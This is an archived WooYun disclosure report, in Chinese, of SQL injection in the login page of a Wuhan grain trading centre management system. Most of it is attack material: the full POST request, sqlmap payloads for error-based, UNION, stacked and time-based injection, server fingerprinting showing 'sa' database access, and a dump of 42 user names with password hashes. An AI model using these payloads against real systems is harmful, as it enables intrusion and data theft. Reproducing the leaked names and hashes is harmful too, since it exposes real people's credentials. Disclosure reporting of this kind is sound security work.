乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-11: 厂商已经确认,细节仅向厂商公开 2015-12-21: 细节向核心白帽子及相关领域专家公开 2015-12-31: 细节向普通白帽子公开 2016-01-10: 细节向实习白帽子公开 2016-01-23: 细节向公众公开
某国家粮食交易中心管理系统SQL注入
武汉国家粮食交易中心管理系统SQL注入URL:**.**.**.**/login.aspx问题出现在登录框的账户名字段txtName
POST /login.aspx HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: **.**.**.**/login.aspxCookie: JL_SYSTEM=GJLSJYZXAdminName=&GJLSJYZXAdminPwd=; ASP.NET_SessionId=ae0u3th2ghozt0fejy2wsr5qConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 365__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTA4MjkyMjM2MWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZ85tF93DigV6T2qWGBZUCpp%2F5leXo6gEazsCyPgZkAi&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBAKI5quICgLEhISFCwLKw6LdBQLSwpnTCD9382RgmhdlOvhT1GKML6h%2F0%2FOLaO2KqK55teHa%2B7eD&txtName=admin&txtPass=123123&ImageButton1.x=68&ImageButton1.y=17
Parameter: txtName (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTA4MjkyMjM2MWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZ85tF93DigV6T2qWGBZUCpp/5leXo6gEazsCyPgZkAi&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBAKI5quICgLEhISFCwLKw6LdBQLSwpnTCD9382RgmhdlOvhT1GKML6h/0/OLaO2KqK55teHa+7eD&txtName=admin' AND 9672=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9672=9672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113))) AND 'tkrx'='tkrx&txtPass=123123&ImageButton1.x=68&ImageButton1.y=17 Type: UNION query Title: Generic UNION query (NULL) - 62 columns Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTA4MjkyMjM2MWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZ85tF93DigV6T2qWGBZUCpp/5leXo6gEazsCyPgZkAi&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBAKI5quICgLEhISFCwLKw6LdBQLSwpnTCD9382RgmhdlOvhT1GKML6h/0/OLaO2KqK55teHa+7eD&txtName=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(73)+CHAR(106)+CHAR(105)+CHAR(80)+CHAR(109)+CHAR(72)+CHAR(115)+CHAR(89)+CHAR(114)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &txtPass=123123&ImageButton1.x=68&ImageButton1.y=17 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTA4MjkyMjM2MWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZ85tF93DigV6T2qWGBZUCpp/5leXo6gEazsCyPgZkAi&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBAKI5quICgLEhISFCwLKw6LdBQLSwpnTCD9382RgmhdlOvhT1GKML6h/0/OLaO2KqK55teHa+7eD&txtName=admin'; WAITFOR DELAY '0:0:5'--&txtPass=123123&ImageButton1.x=68&ImageButton1.y=17 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTA4MjkyMjM2MWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZ85tF93DigV6T2qWGBZUCpp/5leXo6gEazsCyPgZkAi&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBAKI5quICgLEhISFCwLKw6LdBQLSwpnTCD9382RgmhdlOvhT1GKML6h/0/OLaO2KqK55teHa+7eD&txtName=admin' WAITFOR DELAY '0:0:5'--&txtPass=123123&ImageButton1.x=68&ImageButton1.y=17---[03:29:29] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2005
数据库列表:
当前用户名:sa
用户数据:
[42 entries]+----------+--------------------------+| UserName | Password |+----------+--------------------------+| 严芬 | 1QHEEnnQRe0+lMhhHIcOxw== || 李君丽 | 2MWqI4bUWHoS1lv4OcNYmw== || 王晓玲 | 59PDruhr08OvnbPwlAmMkw== || 王翔 | 5QcBGLcLtmuNLNypoN+pyw== || 徐国银 | 8CeiVk9FiHFMIOPAq98jNA== || 陈保国 | 9zdVWCke/hSEP2TBHRGzvA== || 黄钢 | a+UdC/AIakNcKRgN7sluDw== || 林荣华 | B1uAPGTRrD+6pXlZYH8Flg== || 夏天 | b8SaEjw3udBOl+aavicNPg== || 黄静远 | cPMJeemj13q2k5vE8GR+kg== || 李军 | Exgy1rMPrB2AId49LHMH2g== || 程临铮 | f+U1fQy2rTg1riPqX8Xw3g== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 刘海涛 | Ktd/CUy2FoKdsVLc0SBPwg== || 万丁 | mzp/gUVSSabB1m/HHA7gqQ== || gly | ng1nf4K44VVJWU3Saieytg== || 吴拼拼 | q8dC7BfpMz3Dq6heNuEYBg== || 唐涛 | ROO0H+YLJADir1CdI3oCGA== || 胡磊 | UyqKgRuruyTHhIV+2LrWXg== || 刘立光 | vDrebu5BoQI0hqLRy8zK7g== || 张汉宜 | wrS/QGfP6eMvGoOGP2spPg== |+----------+--------------------------+
过滤txtName参数
危害等级:中
漏洞Rank:8
确认时间:2015-12-11 14:37
CNVD未复现所述情况,暂未列入处置流程。
暂无
